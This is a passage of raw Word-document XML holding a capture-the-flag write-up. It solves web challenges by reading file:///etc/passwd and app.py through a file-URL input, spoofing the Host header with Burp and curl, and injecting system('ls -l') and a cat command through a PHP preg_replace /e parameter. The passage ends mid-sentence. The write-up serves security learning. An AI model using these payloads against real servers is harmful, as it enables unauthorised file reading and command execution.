                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="476655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BE602" w14:textId="5373C46F" w:rsidR="003249E9" w:rsidRDefault="003249E9" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This gave me the suspicion that application or server is not correctly configured. First of all, I w</w:t>
      </w:r>
      <w:r w:rsidR="00471BA2">
        <w:t xml:space="preserve">ill check the application on LFI attack. I will try to access the file that every website has by writing in the input field: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00471BA2" w:rsidRPr="006B2499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00471BA2">
        <w:t>, which returns the given result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C1F85" w14:textId="77777777" w:rsidR="00471BA2" w:rsidRDefault="00471BA2" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D932A06" w14:textId="08F40623" w:rsidR="00471BA2" w:rsidRDefault="00471BA2" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BDE058A" wp14:editId="3AC74021">
            <wp:extent cx="5943600" cy="1507787"/>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1"/>
                    <a:srcRect b="77287"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1507787"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1912FC30" w14:textId="77777777" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61434754" w14:textId="3F19B54F" w:rsidR="00471BA2" w:rsidRPr="00A44356" w:rsidRDefault="00A44356" w:rsidP="00A44356">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44356">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>პირველი ვარიანტი:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597D095" w14:textId="09AE6708" w:rsidR="002C6AC1" w:rsidRDefault="00AB4F57" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the screenshot above, </w:t>
      </w:r>
      <w:r w:rsidR="007460F8">
        <w:t xml:space="preserve">we see that there is a directory /home/ctf. A wild guess for the name of the python source code - app.py. We knew that the server runs python from the below response header - </w:t>
      </w:r>
      <w:r w:rsidR="007460F8" w:rsidRPr="007460F8">
        <w:t>`Server: Werkzeug/2.0.1 Python/3.6.9`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72544F5A" w14:textId="73BB1B5C" w:rsidR="007460F8" w:rsidRDefault="007460F8" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C159506" wp14:editId="518689A8">
            <wp:extent cx="5943600" cy="2218055"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10795"/>
            <wp:docPr id="280" name="Google Shape;280;p1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80" name="Google Shape;280;p19" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId22">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2218055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="252831"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD883A" w14:textId="77777777" w:rsidR="00A85B48" w:rsidRPr="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85B48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>მეორე ვარიანტი:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD3CD9" w14:textId="4C38BDCD" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By using dev tools and inspecting the website, in the response header it is visible that server works on Werkzeug/2.0.1 Python/3.6.9, therefore wild guess would be that the file name is app.py.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960DFBA" w14:textId="5A52CA19" w:rsidR="007460F8" w:rsidRDefault="007460F8" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Let’s send the payload and write in input: File:/home/ctf/app.py, which will give us the result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48415FFD" w14:textId="6035573E" w:rsidR="007460F8" w:rsidRDefault="007460F8" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C3A3DDC" wp14:editId="6D0126AB">
            <wp:extent cx="5943600" cy="1147864"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1340668122" name="Picture 1340668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122" name="Picture 1340668122" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="82333"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1147864"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C1DA4D" w14:textId="77777777" w:rsidR="00A85B48" w:rsidRDefault="007460F8" w:rsidP="007460F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Above we can see that if the ‘Host’ header is set to ‘company.tld’, we will get the flag. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FF299E" w14:textId="1909129B" w:rsidR="00A85B48" w:rsidRPr="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="007460F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85B48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>პირველი ვარიანტი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4826CF" w14:textId="37D64FD8" w:rsidR="007460F8" w:rsidRDefault="007460F8" w:rsidP="007460F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>We will intercept the request and change Host value by using Burp suit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCEC845" w14:textId="4B681DD1" w:rsidR="007460F8" w:rsidRDefault="007460F8" w:rsidP="007460F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="744CAF4B" wp14:editId="033EBA6B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="806202027" name="Picture 8062020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2027" name="Picture 806202027" descr="Graphical user interface, text, application, email&#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BE1A889" w14:textId="48A8637D" w:rsidR="000216DB" w:rsidRDefault="000216DB" w:rsidP="007460F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Which will return the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27650910" w14:textId="1972BDA1" w:rsidR="00A44356" w:rsidRDefault="000216DB" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B6D4396" wp14:editId="11A318EC">
            <wp:extent cx="5943600" cy="3350260"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3350260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3AD11" w14:textId="77777777" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262457A2" w14:textId="6E849823" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A85B48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>მეორე ვარიანტი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EDCFAF" w14:textId="77777777" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I will use a curl command for finding the flag and it returns the flag: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C069F" w14:textId="56BE19BA" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X $’POST’ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF32A75" w14:textId="660C9951" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>-H $’Host: company.tld’ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9469B7" w14:textId="026FE883" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>--data $’url</w:t>
      </w:r>
      <w:r w:rsidR="00AF14A8">
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>file:home/ctf/app.py’ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEAA7D1" w14:textId="518F1E02" w:rsidR="00A85B48" w:rsidRPr="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>$’http://34.107.45.207:30867/’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5515BAF9" w14:textId="3DB2C80F" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB1CCFB" wp14:editId="150D8FAB">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79266D36" w14:textId="77777777" w:rsidR="00A85B48" w:rsidRPr="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2613D5EB" w14:textId="77777777" w:rsidR="00A85B48" w:rsidRDefault="00A85B48" w:rsidP="00A85B48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B908B0D" w14:textId="2C329AF0" w:rsidR="00A44356" w:rsidRPr="00A44356" w:rsidRDefault="00A44356" w:rsidP="00A44356">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Alien inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F16AE" w14:textId="47D369F4" w:rsidR="002C31A8" w:rsidRDefault="00160EE9" w:rsidP="002C31A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>When we access the alien-inclusion challenge we will be given the source code. We sent the flag.php value as the POST start parameter through guessing and we will use curl command with additional parameters to achieve the result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEA7366" w14:textId="45084329" w:rsidR="00160EE9" w:rsidRPr="00160EE9" w:rsidRDefault="00160EE9" w:rsidP="00A44356">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160EE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>პირველი ვარიანტი:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F392C" w14:textId="063BBAB8" w:rsidR="002C31A8" w:rsidRDefault="00160EE9" w:rsidP="002C31A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command is: curl -X ‘POST’ ‘http://35/242/226/178:304007?start=’ --data ‘start=flag.php’ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D3752" w14:textId="1DF5AA33" w:rsidR="00160EE9" w:rsidRDefault="00160EE9" w:rsidP="00160EE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BDE2C3C" wp14:editId="2442DDC6">
            <wp:extent cx="4507071" cy="963038"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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7"/>
                    <a:srcRect l="41735" t="29678" r="14070" b="53534"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4558548" cy="974037"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C8AEB" w14:textId="6C34C67D" w:rsidR="002C31A8" w:rsidRDefault="002C31A8" w:rsidP="00160EE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>-X I say that I want request to be POST method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C598C6F" w14:textId="77777777" w:rsidR="00C63CA4" w:rsidRDefault="00C63CA4" w:rsidP="00160EE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2D91A3" w14:textId="42C5314B" w:rsidR="00160EE9" w:rsidRPr="00160EE9" w:rsidRDefault="00160EE9" w:rsidP="00160EE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160EE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>მეორე ვარიანტი:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160FFF1E" w14:textId="4ACE5658" w:rsidR="00160EE9" w:rsidRPr="00160EE9" w:rsidRDefault="00160EE9" w:rsidP="00160EE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Command is: curl ‘http://35/242/226/178:304007?start=’ --data ‘start=flag.php’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B522D" w14:textId="2FC6C2DD" w:rsidR="00AB4F57" w:rsidRDefault="002C31A8" w:rsidP="002C31A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="002C31A8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA4A383" wp14:editId="6503171C">
            <wp:extent cx="4494179" cy="1167319"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="343" name="Google Shape;343;p2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43" name="Google Shape;343;p26" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId28">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4518149" cy="1173545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE9C28" w14:textId="4BB86F8B" w:rsidR="00C63CA4" w:rsidRDefault="002C31A8" w:rsidP="00C63CA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>--data attribute gives us information from a request, and in start parameter we can use the name of flag file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B98DFFC" w14:textId="40912B7E" w:rsidR="00C63CA4" w:rsidRPr="00C63CA4" w:rsidRDefault="00C63CA4" w:rsidP="00C63CA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Substitute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AE97D" w14:textId="089FCEB8" w:rsidR="00C63CA4" w:rsidRDefault="00C63CA4" w:rsidP="00C63CA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>From the given php code, we understand that by setting vector and replace value it will echo the given result. In our case, if Vector is equal to admin and we pass command to replace, in this case ls -l command, so that we see all the content, the command will be actually executed. For that, we have to write so in url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545CC1D" w14:textId="219C05D9" w:rsidR="00C63CA4" w:rsidRPr="00C63CA4" w:rsidRDefault="00C63CA4" w:rsidP="00C63CA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63CA4">
        <w:t>http://34.159.78.10:30638/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.php?vector=/Admin/e&amp;replace=system(‘ls -l’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67892603" w14:textId="56FC9731" w:rsidR="00C63CA4" w:rsidRDefault="00C63CA4" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>This will return the result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626EF729" w14:textId="39F01BCC" w:rsidR="00C63CA4" w:rsidRDefault="00C63CA4" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63CA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B672DD6" wp14:editId="50564495">
            <wp:extent cx="5725662" cy="2453423"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="23495"/>
            <wp:docPr id="218" name="Google Shape;218;p16"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8" name="Google Shape;218;p16" descr="Text&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId29">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5725662" cy="2453423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A7BE3" w14:textId="228DDC99" w:rsidR="00C63CA4" w:rsidRPr="0046472A" w:rsidRDefault="00C63CA4" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>In the listed folder, we see a folder named here_we_dont_have_flag, which is suspicious and will modify the url, so that we see the flag.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221F3454" w14:textId="58BA9586" w:rsidR="00C63CA4" w:rsidRPr="00C63CA4" w:rsidRDefault="00C63CA4" w:rsidP="00C63CA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63CA4">
        <w:t>http://34.159.78.10:30638/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?vector=/Admin/e&amp;replace=system(‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat%20here_we_dont_have_flag/flag.txt’</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276DB025" w14:textId="53285721" w:rsidR="0046472A" w:rsidRDefault="00C63CA4" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This will of course return the result, where word Admin is replaced by the </w:t>
      </w:r>
      <w:r w:rsidR="00F71756">
        <w:t>flag,</w:t>
      </w:r>
      <w:r>
